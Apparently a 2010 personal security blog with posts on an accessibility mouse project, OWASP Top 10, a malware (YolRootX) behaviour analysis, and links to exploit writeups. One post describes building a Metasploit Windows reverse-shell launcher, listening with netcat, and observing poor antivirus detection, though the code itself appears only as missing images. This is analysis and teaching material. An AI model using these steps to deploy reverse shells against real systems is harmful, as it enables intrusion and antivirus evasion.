Friday, April 30, 2010

MouseGlove: New Video

Hi folks,
today I wanna show you this nice video of the next generation of mouse: MouseGlove


MouseGlove from Marco Ramilli on Vimeo.


During the last past days I received a lot of emails about this project. I promise I will answer to all of you, I need only time :D. Thank you very much for you wonderful words and support. I hope you guys will improve the current version . If you will, please send me back emails with pictures and if you wish video like this one. Thanks..
Stay tuned, big news on security are coming up.

Sunday, April 25, 2010

Introducing ... MouseGlove V0.1 !

Hi Folks,
during the past week I've been working hard on several projects. One of them is called MouseGlove and now is available the version 0.1 here on sourceforge (http://mouseglove.sourceforge.net). If you are a developer grab my source and improve it !
Lets take a look to MouseGlove V0.1






MouseGlove is an open source project for a new generation of mouse. The goal of this project is to provide an open source hardware and software stimulating new developers to improve the usability of computers through new interfaces. MouseGlove is a new kind of interface born for helping people affected by disabilities who cannot use common interfaces such as mouse and keyboard. MouseGlobe offers a natural way to move the screen pointer, click and drag objects. Each action is natural as using your hands to keep, move and touch real objects on a desktop. I encourage every developer to grab my source code and electronics and build an improved version of MouseGlove, keeping alive the next generation of computer mouse interfaces.

Monday, April 19, 2010

Windows ShellCode Detection

Hi Folks, today I wanna drive you through a nice malware analysis experience that happened to me this freshly morning. Basically, for a penetration testing commission, I had to evaluate some ShellCodes, coming up with some judgments on the efficiency and on the validity of them.
For this reason I performed tons of shellcode testing and stuff like that. But what is interesting right now is when analyzing the shellcodes, in both way: Statically and Dynamically, I find out that only few AVs detect them..... Come on guys, we are talking about shellcodes not new virus's paradigms ..... it should be very easy to detect since they span a shell... right ? (see dynamic analysis)

So let's try it. First of all you need to build your own payload. I built a generic windows reverse shell. The generate command under Metasploit3 is really useful in such case. The following image shows how to generate a simple payload using Metasploit3.




After you got the desired payload, you have to write a simple code to run it. The following image shows my simple payload running code.

Alright, what we need now is to compile our ShellCode launcher. Since I am a MAC user I use MinGw to compile for Windows platforms.

Here we go ! We got a wonderful a.exe Windows executable. Now, of course it works.. Just start :
nc -l 4444
on our local machine, run a.exe on your windows machine.. and everything work fine !
BUT it's not he point. The real point is coming now. Analyzing a.exe with some services like VirusTotal you discover that only few AVs detect the shellcode as malware.



As you can see these AVs such as: AVAST,GData and Microsoft detects the crafted shellcode, but they are only few of all and moreover they are neither the most used AVs in commerce. That seems very weird. So let's see if it's so difficult to detect shellcodes.
Summary of Dynamic analysis:

Interesting Libraries:
LoadLibrary(ws2_32)
LoadLibrary(mswsock.dll)
LoadLibrary(hnetcfg.dll)
LoadLibrary(rpcrt4.dll)
LoadLibrary(wshtcpip.dll)
CreateProcess((null),cmd,(null))
GetModuleHandle(winlogon.EXE)
LoadLibrary(version.dll)
LoadLibrary(cmd.exe)
GetModuleHandle(advapi32)
LoadLibrary(advapi32.dll)
LoadLibrary(ntdll.dll)

Execution:
Executing: c:\windows\system32\cmd.exe
CreateProcess(C:\WINDOWS\system32\netstat.exe,netstat,C:\Documents and Settings\Administrator\Desktop)
LoadLibrary(netstat.exe)
Executing: c:\windows\system32\netstat.exe
OpenService(RemoteAccess)
OpenService(Router)

[...]


Well .... an application which loads cmd and ntdll; which executes cmd and the netstat .. well doesn't look like a shellcode ? Is it so difficult to detect ? Since some AVs detect the shellcode means that it is possible to do, we do had confirmation about that using dynamic sandboxes analysis. So why important AV's companies don't recognize it ? Maybe none is doing dynamic analysis ? ;]. We'll figure out soon ..

OWASP Top 10 out ! (2010)

Hi Folks, this morning I recommend this reading (OWASP Top 10 for 2010) as one of the fundamental reading of all pen-testers.


Summing up the reading:

The OWASP Top 10 Web Application Security Risks for 2010 are:

  • A1: Injection
  • A2: Cross-Site Scripting (XSS)
  • A3: Broken Authentication and Session Management
  • A4: Insecure Direct Object References
  • A5: Cross-Site Request Forgery (CSRF)
  • A6: Security Misconfiguration
  • A7: Insecure Cryptographic Storage
  • A8: Failure to Restrict URL Access
  • A9: Insufficient Transport Layer Protection
  • A10: Unvalidated Redirects and Forwards

Please help us make sure every developer in the ENTIRE WORLD knows about the OWASP Top 10 by helping to spread the world!!!

As you help us spread the word, please emphasize:

  • OWASP is reaching out to developers, not just the application security community
  • The Top 10 is about managing risk, not just avoiding vulnerabilities
  • To manage these risks, organizations need an application risk management program, not just awareness training, app testing, and remediation

We need to encourage organizations to get off the penetrate and patch mentality. As Jeff Williams said in his 2009 OWASP AppSec DC Keynote: “we’ll never hack our way secure – it’s going to take a culture change” for organizations to properly address application security.

Friday, April 16, 2010

Finally Speed Matter

Hi Folks,
finally Google discovered speed ! :D Just kidding... I am so happy that Google announced (see below) that the web-site-speed will be a new search parameter. Making it shorter: faster is your web site higher will be its Google rank.



At Google, we've gathered hard data to reinforce our intuition that "speed matters" on the Internet. Google runs experiments on the search results page to understand and improve the search experience. Recently, we conducted some experiments to determine how users react when web search takes longer. We've always viewed speed as a competitive advantage, so this research is important to understand the trade-off between speed and other features we might introduce. We wanted to share this information with the public because we hope it will give others greater insight into how important speed can be.

Speed as perceived by the end user is driven by multiple factors, including how fast results are returned and how long it takes a browser to display the content. Our experiments injected server-side delay to model one of these factors: extending the processing time before and during the time that the results are transmitted to the browser. In other words, we purposefully slowed the delivery of search results to our users to see how they might respond.

All other things being equal, more usage, as measured by number of searches, reflects more satisfied users. Our experiments demonstrate that slowing down the search results page by 100 to 400 milliseconds has a measurable impact on the number of searches per user of -0.2% to -0.6% (averaged over four or six weeks depending on the experiment). That's 0.2% to 0.6% fewer searches for changes under half a second!

Furthermore, users do fewer and fewer searches the longer they are exposed to the experiment. Users exposed to a 200 ms delay since the beginning of the experiment did 0.22% fewer searches during the first three weeks, but 0.36% fewer searches during the second three weeks. Similarly, users exposed to a 400 ms delay since the beginning of the experiment did 0.44% fewer searches during the first three weeks, but 0.76% fewer searches during the second three weeks. Even if the page returns to the faster state, users who saw the longer delay take time to return to their previous usage level. Users exposed to the 400 ms delay for six weeks did 0.21% fewer searches on average during the five week period after we stopped injecting the delay.

While these numbers may seem small, a daily impact of 0.5% is of real consequence at the scale of Google web search, or indeed at the scale of most Internet sites. Because the cost of slower performance increases over time and persists, we encourage site designers to think twice about adding a feature that hurts performance if the benefit of the feature is unproven.


For more information check out here !

Thursday, April 15, 2010

Exploiting a kernel NULL dereference

Hi Folks,
I am sorry for the long silence, but during this month I am very busy :(
Today I just wanna suggest this reading on Kernel Exploitation


We can demonstrate the first fact with the following program, which writes to the null_read file to force a kernel NULL dereference, but with the NULL page mapped, so that nothing goes wrong:



Writing to that file will trigger a NULL pointer dereference by the nullderef kernel module, but because it runs in the same address space as the user process, the read proceeds fine and nothing goes wrong – no kernel oops. We’ve passed the first step to a working exploit.

Friday, April 9, 2010

WebKit2: a good chance for security !

Hey Folks,
finally Safari decided to upgrade its webkit adding sandboxes and process separations. Here the official high level documentation




Take a look, it seems to very promising !

Thursday, April 8, 2010

iGov 2010. I'll be there!

A totally new experience for me. If you are one of the few selected researcher please contact me, we might get there together.



Today, digital government (DG) research is being conducted all over the world. Most of this work is focused within the geographic and political contexts of individual countries. However, given the growing influence of global economic, social, technical, and political forces, the questions embedded in digital government research are now expanding to international dimensions that focus on topics that cross the jurisdictions, cultures, or customs of different countries.
The iGov Research Institute, a week-long residential program, provides doctoral students from around the world an opportunity to assess the impact of information and communication technologies in the public sector and to understand the value of doing research in an international context. Developed by the Center for Technology in Government, under the sponsorship of the U.S. National Science Foundation, the Institute takes advantage of the experiences of a major city or region as an integral part of the program. It includes field visits and discussions with innovative government leaders, as well as academic sessions.

Tuesday, April 6, 2010

Malware YolRootX

Hi Folks,
with no time for good posts, I just paste here some analysis performed on YolRootX, a new malware that I analyzed yesterday.




File System Changes:

(Adding a new certificate!)
- C:\Documents and Settings\Administrator\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1078081533-1677128483-1801674531-500\699c4b9cdebca7aaea5193cae8a50098_5fc4e98d-1101-4864-b0bf-e0b3f6d9d878

(Some cookies ... just in case ;) )
- C:\Documents and Settings\Administrator\Cookies\administrator@globo[1].txt
- C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt
- C:\Documents and Settings\Administrator\Cookies\administrator@www.globo[1].txt

(hidden content into \Temp)
C:\Documents and Settings\Administrator\Local Settings\Temp\~DFC517.tmp

(Internet Explorer settings ... )
..\software\microsoft\internet explorer\main

(Ahh Ahmm ! autostart key under reg\user !)
user\current\software\Microsoft\Internet Explorer\Toolbar\Locked = 01000000

(Did I ask for these queries ? ;) )

Query DNS: www.oviedolocal3476.com
Query DNS: www.globo.com
Query DNS: ads.globo.com
Query DNS: ads.img.globo.com
Query DNS: fpdownloadocument.macromedia.com
Query DNS: fpdownloadocument.macromedia.com.gateway.2wire.net
Query DNS: activex.microsoft.com
Query DNS: codecs.microsoft.com
Query DNS: video.globo.com
Query DNS: www.google-analytics.com
Query DNS: imagem2.buscape.com.br
Query DNS: www.google.com
Query DNS: clients1.google.com
Query DNS: id.google.com

(I don't speak spanish at all ...)
Internet connection: Connects to "65.55.13.243" on port 80 (TCP - HTTP).
Internet connection: Connects to "201.7.178.53" on port 80 (TCP - HTTP).
Internet connection: Connects to "74.125.19.113" on port 80 (TCP - HTTP).

(Processes, new service and binary injection ?? )
Created process: (null),explorer.exe http://www.globo.com,(null)
Opened a service named: ShellHWDetection
Injected code into process: explorer.exe
Injected code into process: iexplore.exe

( loading interesting Windows API)

LoadLibrary(netapi32.dll)
LoadLibrary(kernel32.dll)
LoadLibrary(version.dll)
LoadLibrary(explorer.exe)
LoadLibrary(comctl32.dll)
LoadLibrary(shell32.dll)
LoadLibrary(windowsshell.manifest)
LoadLibrary(browselc.dll)
LoadLibrary(wsock32)
LoadLibrary(mswsock.dll)
LoadLibrary(hnetcfg.dll)
LoadLibrary(wshtcpip.dll)
LoadLibrary(actxprxy.dll)
LoadLibrary(msmsgs.exe)
LoadLibrary(jscript.dll)


Monday, April 5, 2010

PHP 6.0 Dev str_transliterate(). A great Example !

Hi Folks,
today I wanna point out this nice Exploit on PHP 6.0 Dev. str_transliterate() Buffer Overflow, implemented by Pr0T3cT10n. Why I say that it's a nice exploit ? Well, in my opinion this is a great easy example of Buffer Overflow.. optimal to learn and amazing to show that even new applications own old bugs due to poor security development.
Right now I'm thinking to CeSeNA folks (cesena.ing2.unibo.it), many of them burn to know how to inject a shell code through Buffer Overflow. For all of you interested on the "art of exploitation", I totally suggest to start from this self-commenting example. (Click to Enlarge)



There are no comments regarding shellcodes since I've discussed a lot in the past. I will probably use this exploit during my future talks on Buffer Overflow. Hope you enjoy this didactic exploit.



Original code. (Download here)
Original Vulnerable app (Download here)


*Upgrade:*
Yes, of course: \u4141 is two 'A' , and \u9090 is two NOPs. Basically 20 x (2)NOP = 40 and 256 x (2)A = 512. Thanks to TheLeader for pointing it out .

iPad Jailbreaking !

Only a video. Nothing more that that to explain the "situation" here.

Saturday, April 3, 2010

.htaccess automation

Hi Folks,
today I needed to write up a .htaccess for a web site of mines. It has been a while since I didn't write it, and as always happens I forget its syntax ... well I forget almost everything about it. I thought... No way, I don't wanna study again the syntax , it must be an automatic and online tool for its generation. Of course there is ! :D And here it is !


.htaccess is a very useful web server' s feature. Unfortunately people like me who don't use this feature very often, since not web-designer, tend to forget how to write it. Using this free and online tool we can seep-up our "web-developer's hour". Enjoy your future htaccess creation ! Now you can forget about it ;)